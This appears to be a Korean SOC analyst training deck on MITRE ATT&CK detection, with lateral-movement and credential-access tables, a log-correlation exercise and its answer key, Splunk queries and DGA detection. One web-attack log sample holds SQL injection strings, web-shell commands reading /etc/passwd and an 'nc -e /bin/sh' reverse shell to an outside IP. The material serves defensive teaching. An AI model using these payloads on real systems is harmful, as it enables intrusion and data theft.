⚠️ 황금 규칙: -w hidden + -enc/-NoP/-NonI 조합이 있으면 오탐 가능성 <5%. 즉각 조사. 단독 파라미터는 맥락(Parent Process, 시간, 계정) 함께 봐야 함

보강 설명 PowerShell 탐지는 SOC에서 하루에도 수십 건 발생합니다. 어떤 것이 진짜 위협이고 어떤 것이 정상인지 빠르게 판단하는 실전 기준을 훈련합니다.… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

T1059.001PowerShell 정탐 오탐판단 기준

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1059.001·예외 조건·출력 필드를 함께 설계

Lateral Movement 완전 분석: 모든 이동 경로 × 탐지 매핑

10가지 이동 방법 × 탐지 로그 × ATT&CK × 핵심 판단 기준 — 실무 참조 완전판

Lateral Movement 마스터

이동 방법	ATT&CK	핵심 탐지 로그	탐지 조건 (핵심)	오탐 주의	위험도
RDP (원격 데스크탑)	T1021.001	WinEvent 4624 Type=10, Sysmon 3 Port 3389	연쇄 RDP(A→B→C), 새벽 시간, 처음 접근 서버	관리자 정기 접속, 점프서버	★★★★★
SMB/파일 공유	T1021.002	WinEvent 5145, 4624 Type=3	비정상 시간 + 새로운 대상 + 관리 공유(C$, ADMIN$)	IT팀 파일 배포, 백업	★★★★
Pass-the-Hash	T1550.002	WinEvent 4624 Type=9, 4648	Logon Type=9(NewCredentials) + NTLM 인증 + 비정상 계정	루아스 실행 계정	★★★★★
PsExec	T1569.002	Sysmon 1(PSEXESVC.exe 생성), WinEvent 7045	PSEXESVC.exe 서비스 임시 생성 + 원격 실행	공식 IT 운영 툴	★★★★
WMI 원격 실행	T1047	WinEvent 4688(wmiprvse.exe 자식), Sysmon 20	wmiprvse.exe → cmd/ps 생성 + 원격 호스트 지정	정상 WMI 관리 쿼리	★★★★
SSH 내부 이동 (Linux)	T1021.004	/var/log/auth.log, auditd	서버→서버 SSH(비정상), 새벽 시간, 자동화 키	배포 자동화, Ansible	★★★
Pass-the-Ticket	T1550.003	WinEvent 4768, 4769 (다른 머신에서 티켓 사용)	티켓 발급 IP ≠ 사용 IP, 비정상 SPN	—	★★★★★
WinRM (PowerShell Remoting)	T1021.006	WinEvent 4624 Type=3, 6, Sysmon 3 Port 5985/5986	비관리자 계정 WinRM, 연쇄 이동	IT 자동화, DSC	★★★
Kerberos 티켓 위조 (Silver)	T1558.002	WinEvent 4769 (PAC 구조 이상)	PAC 없는 티켓, 비표준 암호화, 만료되지 않는 티켓	—	★★★★★
DCOM 원격 실행	T1021.003	WinEvent 4688(DCOM 서버 프로세스), Sysmon 3	mmc.exe, msiexec.exe 원격 생성, 비정상 CLSID	정상 DCOM 관리	★★★

✅ Lateral Movement 탐지 3원칙: ① 처음 통신하는 내부 IP 조합에 집중 ② 연쇄 이동(A→B→C) 패턴 상관 ③ 자격증명 탈취(Credential Access) 탐지 후 30분 이내 내부 이동 즉각 감시 강화

보강 설명 Lateral Movement는 탐지가 어렵지만 막지 못하면 피해가 기하급수적으로 커집니다. 각 이동 방법별로 어떤 로그에서 무엇을 봐야 하는지 완전… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

Lateral Movement…RDP SMB WMIPass-the-Hash

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Lateral Movement 완전 매핑·예외 조건·출력 필드를 함께 설계

고밀도 실전 분석: 9개 소스 × 15개 이벤트 → 공격 체인 완성

순서가 섞인 15개 이벤트를 정렬하고 ATT&CK으로 매핑 — 탐지 공백과 대응 포인트까지 식별하라 (20분)

고밀도 실전 분석

# ① FW 14:32 ALLOW 10.0.1.33→185.107.4.9:443 # ② WinEvent 08:52 4624 Type=3 user:kim.jin → \\SQL-01 # ③ EDR 09:03 lsass.exe ProcessAccess src:unknown_x64.exe # ④ MailGW 08:21 RECV report_2024.docm DKIM:FAIL # ⑤ DNS 09:04 QUERY cdn-fast-update.net (VT:19/94, Age:4d) # ⑥ WinEvent 08:44 4698 TaskName:WindowsDefUpdate path:C:\ProgramData\ # ⑦ Proxy 14:58 POST mega.nz/upload 8.7GB arch.7z # ⑧ EDR 08:31 WINWORD.EXE→wscript.exe→powershell.exe -enc Sn... # ⑨ WinEvent 08:33 5001 WindowsDefender RT-Protection DISABLED # ⑩ FileAudit 14:11 \\SQL-01\DB_Backup\ 3,842건 복사 user:kim.jin # ⑪ WinEvent 14:08 4624 Type=10 user:kim.jin → SQL-01 src:10.0.1.33 # ⑫ DNS 08:32 QUERY cdn-fast-update.net (첫 번째 쿼리) # ⑬ WinEvent 08:29 4625 admin×12 10.0.1.33 3min # ⑭ WinEvent 09:02 4628 Domain Admins + user:svc_new99 (신규 계정) # ⑮ Sysmon 08:27 EventID=1 WINWORD.EXE PID=8812 parent=explorer.exe

분석 과제 (20분)

①~⑮를 시간 순서로 정렬 (번호 나열)
각 이벤트의 ATT&CK Tactic + Technique 매핑
이 공격의 주요 전환점(Pivot Point) 2개 식별
탐지됐어야 했지만 놓친 단계: 어느 이벤트?
즉각 대응 3가지 (구체적 조치 포함)
30초 경영진 보고 문장 완성

💡 힌트: ⑮ WINWORD 실행이 시작점. 시간 역순으로 파악하면 더 빠름. ⑨ Defender 비활성화와 ③ lsass 접근 사이의 논리 연결을 찾으세요

보강 설명 고밀도 실전 로그 분석 실습입니다. 9개 소스에서 온 15개 이벤트를 정렬하고 전체 공격 체인을 완성합니다. 팀별로 다른 결론이 나올 수 있으므로 토론이… 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

15개 이벤트 분석9개 소스체인 완성

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
15개 이벤트 분석를 고를 때 대체 설명도 함께 적기

고밀도 분석 해설 — 정렬·매핑·대응 완전 정답

⑮→④→⑧→⑬→⑨→⑥→③→⑭→⑫→⑤→②→⑪→⑩→①→⑦ — 6.5시간의 완전한 침해 체인

고밀도 해설

순서	이벤트	시간	Tactic	Technique	핵심 연결 논리
1	⑮ WINWORD 실행	08:27	Initial Access	T1566.001	④ 첨부파일 수신 후 6분 — 사용자 클릭
2	④ docm 수신	08:21	Initial Access	T1566.001	DKIM FAIL + 악성 확장자 — 첫 침투 벡터
3	⑧ PS 실행	08:31	Execution	T1059.001+T1027	WINWORD→wscript→PS -enc = 매크로 체인
4	⑬ Brute Force	08:29	Credential Access	T1110.001	PS 실행과 동시 Brute Force — 자동화 공격
5	⑨ Defender 비활성화	08:33	Defense Evasion	T1562.001	PS 실행 2분 후 — 페이로드가 AV 끔
6	⑥ 예약 작업 등록	08:44	Persistence	T1053.005	%ProgramData% + Defender 꺼진 후 Persistence
7	③ lsass 접근	09:03	Credential Access	T1003.001	unknown_x64.exe = 전 단계 페이로드가 Mimikatz
8	⑭ 도메인 관리자 추가	09:02	Privilege Escalation	T1098	lsass 직전 — 탈취 자격증명으로 DA 계정 추가
9	⑫ DNS 첫 C2 쿼리	08:32	C&C	T1568+T1071	PS 실행 1분 후 — 즉각 C2 수립
10	⑤ DNS C2 재쿼리	09:04	C&C	T1071.001	lsass 접근 후 결과 전송 추정
11	② kim.jin SMB	08:52	Lateral Movement	T1021.002	탈취된 kim.jin 자격증명으로 SQL-01 접근
12	⑪ kim.jin RDP	14:08	Lateral Movement	T1021.001	오후에 RDP로 SQL-01 재접근, 수집 준비
13	⑩ DB 파일 복사	14:11	Collection	T1039	3,842건 DB 백업 파일 수집
14	① C2 통신	14:32	C&C	T1071.001	수집 후 외부 연결 — 명령 수신 또는 준비 확인
15	⑦ mega.nz 업로드	14:58	Exfiltration	T1567.002	8.7GB 최종 유출. 공격 완료

🚨 피벗 포인트: ① 08:33 Defender 비활성화(⑨) — 이 시점에서 즉각 격리했다면 이후 모든 피해 차단 가능 ② 09:03 lsass 접근(③) — 여기서 막았다면 DA 권한 획득·SQL 이동 차단 가능

보강 설명 15개 이벤트 해설입니다. 정렬 순서와 매핑 결과를 단계별로 설명합니다. 각 이벤트 간 논리적 연결을 강조해주세요. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

해설정렬 결과ATT&CK 매핑

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
해설를 고를 때 대체 설명도 함께 적기

Credential Access 14가지 방법 × 탐지 × 방어 완전 정리

LSASS·SAM·Kerberoasting·브루트포스 등 자격증명 탈취 모든 경로를 한 장에 — 실무 참조 완전판

Credential Access 마스터

방법	ATT&CK	원리 (1줄)	핵심 탐지 방법	핵심 방어
LSASS 메모리 덤프	T1003.001	lsass.exe 메모리에서 해시·평문 추출	Sysmon 10 (ProcessAccess + PROCESS_VM_READ)	Credential Guard, PPL
SAM 파일 추출	T1003.002	C:\Windows\System32\config\SAM 복사 후 크랙	reg save HKLM\SAM 명령 + 파일 접근 감사	볼륨 섀도 삭제 방지
NTDS.dit 추출	T1003.003	DC AD DB 추출 → 전체 도메인 계정 해시	ntdsutil, vssadmin 실행 + NTDS.dit 접근	DC 접근 최소화
DCSync	T1003.006	복제 권한으로 DC에서 해시 직접 요청	WinEvent 4662 (DS-Replication-Get-Changes)	복제 권한 최소화
Kerberoasting	T1558.003	서비스 계정 TGS 요청 후 오프라인 크랙	WinEvent 4769 RC4 TGS 다수	서비스 계정 강력 비번, AES 강제
AS-REP Roasting	T1558.004	사전인증 불필요 계정 AS-REP 요청	WinEvent 4768 + RC4 + 사전인증 없음 플래그	모든 계정 사전인증 활성화
Password Spraying	T1110.003	여러 계정에 소수 비밀번호 시도	여러 계정 4625 실패 + 낮은 계정별 빈도	계정 잠금 정책, MFA
Brute Force	T1110.001	단일 계정 반복 시도	동일 계정 4625 다수 + 4624 성공	계정 잠금, MFA
Password Sniffing	T1040	네트워크에서 평문/해시 캡처	Responder 실행, LLMNR 응답 이상	LLMNR/NBT-NS 비활성화
브라우저 저장 자격증명	T1555.003	Chrome/Firefox 저장 비밀번호 추출	브라우저 프로파일 디렉토리 비정상 접근	패스워드 관리자 사용
Keylogging	T1056.001	키 입력 기록 → 로그인 정보 수집	SetWindowsHookEx API 호출 (Sysmon 7)	EDR + MFA
클립보드 캡처	T1115	클립보드에서 비밀번호 등 탈취	비정상 클립보드 API 호출 (EDR)	민감 정보 클립보드 저장 금지
피싱 자격증명 페이지	T1056.003	가짜 로그인 페이지로 크리덴셜 수집	Proxy 로그 + 피싱 도메인 탐지	FIDO2, 피싱 내성 MFA
OAuth 토큰 탈취	T1550.001	합법적 앱에 광범위 권한 동의 → 토큰 발급	Entra ID 비공식 앱 동의 감사 로그	앱 동의 정책 제한

보강 설명 Credential Access는 공격의 핵심 단계입니다. 방법이 다양하고 각각 탐지 방법이 다릅니다. 14가지 주요 방법을 한 슬라이드에 완전 정리합니다. 시간축과 다음 조치를 함께 보면 흐름이 선명해집니다.

Credential Access…자격증명 탈취 방법탐지 포인트

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기

Defense Evasion 완전 정리: 탐지 우회 16가지 × 대응

가장 많은 Technique를 보유한 Tactic — 우회 방법을 알아야 더 강한 탐지를 설계할 수 있다

Defense Evasion 마스터

우회 기법	ATT&CK	방법	탐지 포인트
보안 도구 비활성화	T1562.001	서비스 중지, 프로세스 종료, 레지스트리 비활성화	WinEvent 5001, 7036 + Tamper Protection
파일 난독화	T1027	Base64, XOR, 커스텀 인코딩	Script Block Logging (EventID 4104) 디코딩 결과
로그 삭제	T1070.001	wevtutil cl, auditpol 변경	WinEvent 1102 + 로그 공백 탐지
파일 삭제	T1070.004	악성 파일 실행 후 즉시 삭제	Sysmon 23(FileDelete), $USNJournal
Timestomping	T1070.006	파일 생성·수정 시각 변조	Sysmon 2 (FileCreateTime 변경)
Process Injection	T1055	정상 프로세스 메모리에 악성 코드 삽입	Sysmon 8(RemoteThread), 10(ProcessAccess)
Process Hollowing	T1055.012	정상 프로세스 교체	프로세스 이미지와 메모리 내용 불일치
DLL 사이드로딩	T1574.002	정상 앱 옆에 가짜 DLL 배치	Sysmon 7(ImageLoaded) + 서명 확인

우회 기법	ATT&CK	방법	탐지 포인트
Rootkit	T1014	커널 레벨 탐지 우회	부팅 시 무결성 검사(Secure Boot, HVCI)
웹 서버 파일 은닉	T1564.001	숨김 파일·폴더 생성	auditd + 파일 감사 정책
ADS 악용	T1564.004	파일 대체 데이터 스트림에 코드 숨김	Sysmon 15(FileCreateStreamHash)
Indirect Command Execution	T1202	cmd 대신 forfiles, pcalua 같은 도구 사용	비표준 실행 도구 CommandLine 분석
Signed Binary Proxy	T1218	서명된 합법 바이너리로 코드 실행	실행 컨텍스트(부모·파라미터·경로) 분석
AMSI Bypass	T1562.001	AMSI DLL 패치 또는 초기화 실패 유도	Script Block Log의 AMSI 관련 코드 탐지
ETW 비활성화	T1562.006	Event Tracing 프로바이더 비활성화	ETW 프로바이더 등록 상태 모니터링
Masquerading	T1036	악성 프로세스를 svchost, lsass처럼 위장	프로세스 경로·서명·부모 일관성 검사

⚠️ 핵심 원칙: Defense Evasion은 항상 다른 Tactic과 함께 온다. 단독으로 발생하면 의심 신호 — 반드시 전후 이벤트를 확인해 연결된 Technique를 찾아야 한다

보강 설명 Defense Evasion은 ATT&CK에서 가장 많은 Technique를 보유한 Tactic입니다. 공격자가 탐지를 피하는 방법들을 이해해야 더 강한… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

T1562T1027T1070

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1562·예외 조건·출력 필드를 함께 설계

Splunk SPL 고급 패턴 10선 — ATT&CK 탐지 핵심 쿼리

copy-paste 말고 이해하며 작성 — 각 패턴의 원리와 ATT&CK 연결을 완전히 이해하라

SPL 마스터클래스

# ① dc() 로 고유 값 카운트 — Password Spraying | stats dc(TargetUserName) as accts by IpAddress | where accts > 10 # ② transaction — 같은 세션 이벤트 묶기 | transaction user maxspan=30m startswith=(EventCode=4625) endswith=(EventCode=4624) # ③ streamstats — 시계열 상관 (Impossible Travel) | streamstats last(country) as prev_c last(_time) as prev_t by user | where country != prev_c AND (_time - prev_t) < 7200 # ④ lookup — TI 피드와 교차 확인 | lookup threat_intel_feed domain AS query OUTPUT malicious_score, threat_type | where malicious_score > 5 # ⑤ eventstats — 그룹 기준 이상 탐지 (Beaconing) | eventstats stdev(bytes) as stdev_b avg(bytes) as avg_b by dest_ip | where stdev_b / avg_b < 0.1 # 크기 일정 = Beaconing

# ⑥ join — 교차 소스 상관 분석 index=sysmon EventCode=10 TargetImage="*lsass*" | join ComputerName [search index=winevent EventCode=7036 ServiceName="*Defender*" param2="stopped"] # ⑦ rare() — 희귀 값 탐지 (신규 프로세스) | rare Image by ComputerName showperc=f | where count < 3 # ⑧ timechart — 시간대별 이상 패턴 | timechart span=1h count by Image # 새벽 급증 시각 시각화 # ⑨ eval if() — 조건 기반 레이블링 | eval risk = if( match(CommandLine, "-enc|-hidden|-bypass"), "HIGH", "LOW") # ⑩ appendcols — 여러 서브쿼리 결과 합치기 | appendcols [search index=vt | rename domain as query]

💡 성능 팁: join은 느리니 stats+where 조합으로 대체. lookup은 캐시돼서 빠름. rare()는 14일 이상 데이터에서 효과적

보강 설명 실무에서 자주 쓰이는 Splunk 고급 SPL 패턴을 10가지 정리합니다. 각 패턴이 어떤 ATT&CK Technique를 탐지하는지 연결합니다. 직접… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

Splunk 고급 SPLstats dcstreamstats

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Splunk 고급 SPL·예외 조건·출력 필드를 함께 설계

3단계 웹 공격 체인 완전 분석: SQLi → 웹쉘 → 내부 이동

웹 로그·WAF·EDR·파일감사 4개 소스 교차 분석 — 각 단계별 탐지 포인트와 차단 전략 완전 정리

웹 공격 완전 분석

# 단계 1: SQLi 시도 (access.log) 10.200.3.4 [Dec 5 09:14:22] "GET /login.php?user=admin'OR'1'='1&pass=x HTTP/1.1" 200 "GET /login.php?user=admin'--&pass= HTTP/1.1" 200 "GET /login.php?user=admin'+UNION+SELECT+1,2,3-- HTTP/1.1" 200 # ATT&CK: T1190 Exploit Public-Facing Application # 탐지: WAF SQLi 패턴 + 연속 200 응답 → 성공 의심 # 단계 2: 웹쉘 업로드 및 실행 09:22 POST /upload.php [파일: shell.php] → 201 Created 09:23 GET /uploads/shell.php?cmd=id → 200 "uid=33(www-data)" 09:24 GET /uploads/shell.php?cmd=whoami+/all # ATT&CK: T1505.003 Web Shell # 탐지: 웹 디렉토리에 신규 .php + 즉각 실행 명령 # 단계 3: 내부 이동 준비 09:31 GET /uploads/shell.php?cmd=cat+/etc/passwd 09:32 GET /uploads/shell.php?cmd=ifconfig 09:33 GET /uploads/shell.php?cmd=nc+-e+/bin/sh+185.3.4.5+4444 # ATT&CK: T1059.004 Unix Shell + T1071 C2

단계별 탐지 전략 및 차단 포인트

단계	탐지 로그	차단 포인트	Coverage
SQLi 탐지	WAF: SQL 패턴 차단, access.log: 특수문자 조합	WAF가 있으면 차단 가능, 없으면 탐지만	2
웹쉘 업로드	파일 감사: 웹 디렉토리 신규 .php 생성	파일 업로드 확장자 화이트리스트	1
웹쉘 실행	access.log: ?cmd= 파라미터 패턴	웹 디렉토리 실행 권한 제거	3
C2 연결	FW: 웹서버→외부 아웃바운드, EDR: nc 실행	웹서버 아웃바운드 화이트리스트	2

✅ 핵심 대응: 웹 디렉토리에 신규 PHP 파일 생성 = 즉각 경보 설정. 웹쉘 실행 패턴(?cmd=, ?exec=)은 WAF 룰에 추가. 웹서버 아웃바운드는 화이트리스트 기반 통제

보강 설명 SQL 인젝션부터 내부 확산까지의 3단계 웹 공격 체인을 완전 분석합니다. 웹 로그, WAF 로그, EDR 로그, 파일 감사 로그를 교차 분석하는 실전… 시간축과 다음 조치를 함께 보면 흐름이 선명해집니다.

웹 공격 체인SQLi 웹쉘 내부이동WAF 로그

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기

고급 헌팅: DGA 도메인 탐지 — 수학적 접근과 실전 구현

랜덤 도메인을 찾는 4가지 지표 — 엔트로피·자음비율·n-gram·길이로 DGA를 수학적으로 탐지

DGA 탐지 마스터

DGA 탐지 4가지 수학적 지표

지표	정상 도메인	DGA 도메인	임계값
문자 엔트로피	낮음 (의미 있는 단어)	높음 (랜덤 문자)	> 3.5 의심
자음/모음 비율	영어 단어 비율 유지	비율 깨짐 (자음 과다)	자음률 > 70% 의심
n-gram 점수	자연어 n-gram 매칭	낮은 n-gram 빈도	p(x) < 0.001 의심
도메인 길이	평균 12자 미만	12~25자 이상	> 15자 의심

DGA vs 정상 도메인 비교 예시

도메인	엔트로피	자음률	길이	판단
google.com	2.58	50%	6	정상
microsoft.com	3.17	62%	9	정상
xk3a9d.net	3.91	67%	6	DGA
qpxrzmvblt.com	4.12	90%	10	DGA
avsvmcloud.com	3.45	63%	10	의심*

*avsvmcloud.com = SolarWinds C2 도메인 (실제 사례)

# Splunk에서 DGA 탐지 쿼리 (엔트로피 계산) index=dns # 등록된 도메인만 추출 (서브도메인 제외) | rex field=query "(?P<reg_domain>[^.]+\.[^.]+$)" # 엔트로피 근사 계산 | eval domain_len = len(reg_domain) | eval unique_chars = len( replace(reg_domain, ".(.)", "")) | eval approx_entropy = ln(unique_chars) * unique_chars / domain_len | where approx_entropy > 2.5 AND domain_len > 8 AND domain_len < 25 # 화이트리스트에 없는 도메인만 | lookup whitelist domain AS reg_domain | where isnull(category) | stats count, dc(src_ip) as clients by reg_domain, approx_entropy | sort -approx_entropy

보강 설명 DGA(도메인 생성 알고리즘) 탐지는 엔트로피와 빈도 분석을 결합한 수학적 접근이 필요합니다. 직관적으로 이해할 수 있는 방식으로 DGA 탐지 원리를… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

DGA 탐지엔트로피 계산n-gram 분석

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
DGA 탐지·예외 조건·출력 필드를 함께 설계

고급 상관 룰: 피싱→C2→유출 자동 탐지 완전 설계

단일 경보로 전체 공격 체인 포착 — 30분 내 4개 조건 동시 충족 시 High 자동 발화

고급 상관 룰 설계

상관 룰 설계 요구사항

같은 호스트에서 30분 이내에 다음 4가지가 모두 발생하면 High 경보:

① Office 프로세스가 PowerShell/cmd 생성
② 신규 외부 도메인 DNS 쿼리 (화이트리스트 없음)
③ 외부 IP로 HTTPS 아웃바운드 연결
④ 파일 서버 대용량 접근 또는 외부 업로드

설계 장점

4가지 조건 모두 충족 → 오탐률 극히 낮음 (<1%)
공격 초기 단계에서 전체 체인 예측 가능
단일 티켓으로 전체 상황 파악
ATT&CK 태그: T1566+T1059+T1071+T1567 자동 부착

# 고급 상관 룰 — Splunk 구현 # Step 1: Office→Shell 탐지 index=sysmon EventCode=1 ParentImage IN ("*\\WINWORD*", "*\\EXCEL*") Image IN ("*\\powershell*", "*\\cmd.exe") | rename ComputerName as host | eval stage1 = "office_shell", t1 = _time # Step 2: 같은 호스트 30분 내 신규 DNS | join type=inner host [ search index=dns | lookup whitelist domain as query | where isnull(category) # 알 수 없는 도메인 | rename src_ip as host | eval stage2 = "new_dns", t2 = _time] # Step 3: 30분 내 조건 확인 | where abs(t2 - t1) < 1800 # Step 4: 외부 업로드 추가 확인 | join type=inner host [ search index=proxy method=POST bytes_out > 50000000 # 50MB+ | rename src_ip as host | eval stage4 = "exfil", t4 = _time] | eval chain_time = t4 - t1 | where chain_time < 3600 # 1시간 내 완성 | table host, t1, t4, chain_time, query

보강 설명 피싱부터 데이터 유출까지의 전체 공격 체인을 단일 SIEM 상관 룰로 탐지하는 고급 설계를 다룹니다. 각 단계가 같은 호스트에서 순차적으로 발생할 때… 시간축과 다음 조치를 함께 보면 흐름이 선명해집니다.

체인 상관 룰단일 경보 전체 체인Splunk transaction

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기

Coverage 점수 계산 워크숍: 실제 환경 기반 계산 실습

아래 환경 정보를 보고 각 Tactic의 Coverage 점수를 직접 계산하라 — 총점과 개선 우선순위까지

Coverage 계산 실습

가상 환경 정보 (중소 금융사)

✅ 메일 게이트웨이 + DKIM/SPF/DMARC 설정
✅ EDR 전 엔드포인트 배포 + Sysmon 설치
✅ SIEM (Splunk) 운영 중 — 기본 탐지 룰 50개
✅ Windows EventLog + Sysmon SIEM 수집
❌ Proxy 로그 SIEM 미수집
❌ DNS 로그 SIEM 미수집
❌ CASB 없음 (클라우드 업로드 탐지 불가)
❌ Purple Team 실시 없음
⚠️ AD 감사 로그 일부만 수집 (4624만)
⚠️ 탐지 룰에 ATT&CK 태그 없음

Tactic	Coverage 점수 (0~3)	판단 근거 (작성)
Reconnaissance	작성	OSINT 탐지 수단 있는가?
Initial Access	2	메일GW 있음, 웹 취약점 탐지 미흡
Execution	2	EDR+Sysmon 있으나 룰 미검증
Persistence	작성	예약작업·레지스트리 탐지 여부
Privilege Escalation	작성	AD 감사 로그 일부만?
Defense Evasion	1	기본 룰 일부, 체계적 탐지 없음
Credential Access	작성	LSASS, Kerberoasting?
Discovery	작성	net 명령 탐지 있는가?
Lateral Movement	작성	RDP/SMB 탐지?
Collection	작성	대용량 파일 복사 탐지?
Command & Control	0	DNS/Proxy 미수집 → 완전 사각
Exfiltration	0	CASB 없음, Proxy 미수집
Impact	작성	랜섬웨어 탐지 가능?

📊 총점 계산: 작성한 점수 합산 → 최대 39점 대비 몇 점? → 퍼센트 Coverage 계산

보강 설명 Coverage 점수를 실제로 계산하는 워크숍입니다. 주어진 환경 정보를 바탕으로 14개 Tactic별 Coverage를 계산하고 총점과 우선순위를… 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

Coverage 점수 계산14개 Tactic별 점수총점 계산

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
Coverage 점수 계산를 고를 때 대체 설명도 함께 적기

사이버 킬체인 × ATT&CK 통합 관점 — 두 프레임워크 완전 비교

Kill Chain은 전략, ATT&CK은 전술 — 두 프레임워크를 함께 쓰면 방어가 더 체계적이 된다

통합 프레임워크

Kill Chain 단계	설명	대응 ATT&CK Tactic	방어 초점
1. Reconnaissance	타겟 정보 수집	TA0043 Reconnaissance	OSINT 모니터링, 노출 최소화
2. Weaponization	공격 도구 준비	TA0042 Resource Dev.	TI 피드로 인프라 추적
3. Delivery	무기 전달	TA0001 Initial Access	메일GW, WAF, 엔드포인트 보호
4. Exploitation	취약점 악용	TA0002 Execution (일부)	패치 관리, AMSI, EDR
5. Installation	Persistence 수립	TA0003 Persistence	예약작업·서비스 모니터링
6. C2	원격 제어 채널	TA0011 C&C	DNS/Proxy 탐지, 아웃바운드 제어
7. Actions on Objectives	최종 목표 달성	TA0009~TA0040 (Collection~Impact)	DLP, 백업, 사고대응

두 프레임워크 비교

관점	Kill Chain	ATT&CK
세분화 수준	7단계 (거시적)	수백 개 Technique (미시적)
활용 목적	전략적 방어 설계	전술적 탐지·대응
갱신 주기	거의 변경 없음	분기별 업데이트
탐지 연결	어려움 (추상적)	직접 연결 (구체적)
보고 활용	경영진 (이해 쉬움)	기술팀 (분석용)

✅ 통합 활용 전략:
경영진 보고 → Kill Chain 단계로 설명 ("Delivery 단계에서 탐지")
기술 분석 → ATT&CK Technique로 상세화 (T1566.001, T1059.001)
두 언어를 모두 구사하는 분석가가 브리징 역할을 한다

보강 설명 사이버 킬체인(Lockheed Martin)과 ATT&CK의 관계를 이해하고 두 프레임워크를 통합해 더 완전한 방어 전략을 수립하는 방법을 다룹니다. 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

사이버 킬체인Lockheed MartinATT&CK 비교

이해 포인트

사이버 킬체인를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

망분리 환경에서의 침해: 우회 방법과 ATT&CK 탐지

망분리가 만능이 아니다 — 자료 전송 솔루션·웹·USB 경유 우회 방법과 탐지 전략

망분리 침해 분석

망분리 우회 시나리오 4가지

자료 전송 솔루션 취약점 (T1190)

인터넷망↔업무망 파일 전송 솔루션에 SQL 인젝션 또는 RCE 취약점. 이 솔루션이 양쪽 네트워크에 연결돼 있어 침투 후 내부로 이동 가능

인터넷 연결 웹서버 경유 (T1505.003)

인터넷 DMZ의 웹서버에 웹쉘 설치 → 내부 서버와 연결된 DMZ 서버가 내부망 진입점이 됨

USB 매개 공격 (T1091)

공격자가 감염된 USB를 내부 직원에게 전달 → 업무망 PC에 연결 시 자동 실행. 에어갭 환경에서도 유효

공급망 통해 내부 악성 소프트웨어 (T1195)

업무망 전용 소프트웨어 공급업체 침해 → 정상 업데이트로 악성 코드 유입

망분리 환경 특화 탐지 전략

자료 전송 솔루션 모니터링: 전송 파일 유형·크기 이상, 비정상 시간 전송, 전송 서버에서 비정상 프로세스
DMZ 서버 집중 감시: 웹서버에서 내부망으로의 연결 시도 즉각 경보
USB 접근 감사 (T1025): WinEvent 2003/2102(USB 연결) + 파일 복사 연속 이벤트
에어갭 호스팅 기록: 업무망 PC의 소프트웨어 설치 이력 → 공급업체 별 신뢰도 등급

🚨 망분리 우회 공격의 현실: 국내 주요 사이버 공격 상당수가 자료 전송 솔루션 취약점 경유. 전송 솔루션은 양쪽 망에 연결돼 있어 침해 시 망분리 무력화. 솔루션 자체의 보안 점검 필수

보강 설명 망분리 환경에서도 공격이 가능합니다. 망간 자료 전송 솔루션, 웹서버를 경유한 침투, USB 매개 공격 등 망분리 우회 방법과 탐지 전략을 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

망분리 우회IT-OT자료 전송 솔루션

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

ATT&CK Data Source 완전 매핑표 — 어떤 Technique에 어떤 로그가 필요한가

탐지 룰 설계 전 첫 번째 단계 — Data Source와 Component를 정확히 파악해야 로그 수집 계획이 나온다

Data Source 완전 참조

Data Source	주요 Component	수집 도구	커버하는 주요 Tactic
Process	Process Creation, Process Access, OS API Execution	Sysmon 1/10, WinEvent 4688	Execution, Defense Evasion, Credential Access
File	File Creation, File Modification, File Deletion, File Metadata	Sysmon 11/23, 파일 감사 정책	Persistence, Collection, Defense Evasion
Network Traffic	Network Connection Creation, Network Traffic Flow, Network Traffic Content	Zeek, NetFlow, Sysmon 3	C2, Exfiltration, Lateral Movement
Logon Session	Logon Session Creation, Logon Session Metadata	WinEvent 4624/4625	Initial Access, Credential Access, Lateral Movement
Windows Registry	Windows Registry Key Creation, Key Modification	Sysmon 12/13/14	Persistence, Privilege Escalation
Scheduled Job	Scheduled Job Creation, Modification, Execution	WinEvent 4698/4699/4700	Persistence, Execution
Service	Service Creation, Modification, Metadata	WinEvent 7045/7036	Persistence, Defense Evasion
Command	Command Execution	Sysmon 1 CommandLine, Script Block Logging	Execution (T1059 전체)

Data Source	주요 Component	수집 도구	커버하는 주요 Tactic
Module	Module Load	Sysmon 7	Defense Evasion (DLL Injection)
Driver	Driver Load	Sysmon 6	Defense Evasion (BYOVD)
DNS	DNS Query, DNS Resolution	Sysmon 22, DNS 서버 로그	C2 (T1071.004), Discovery
